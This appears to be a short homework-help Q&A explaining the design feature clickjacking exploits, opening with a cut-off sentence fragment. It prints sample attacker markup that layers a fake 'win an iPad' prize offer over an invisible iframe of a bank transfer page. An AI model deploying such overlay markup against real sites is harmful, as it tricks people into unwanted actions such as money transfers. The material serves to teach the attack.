From a design perspective, what feature does clickjacking rely on?
Expert Answer
ANSWER::
text ultimately showing through them because of their opacity.
Here’s the key to a clickjacking attack: the target content is hidden and the attacker’s content sits over the top and effectively tricks the victim into clicking links they don’t know they’re clicking. Here’s what the markup of the attacker’s page looks like:
<div style="position: absolute; left: 10px; top: 10px;">Hey - we're giving away iPad minis!!! Just click the WIN button and it's yours!!!</div> <div style="position: absolute; left: 200px; top: 50px;"> <img src="http://images.apple.com/my/ipad-mini/overview/images/hero.jpg"; width="250"> </div> <div style="position: absolute; left: 10px; top: 101px; color: red; font-weight: bold;">>> WIN <<</div> <iframe style="opacity: 0;" height="545" width="680" scrolling="no" src="http://mybank/Transfer.aspx"></iframe>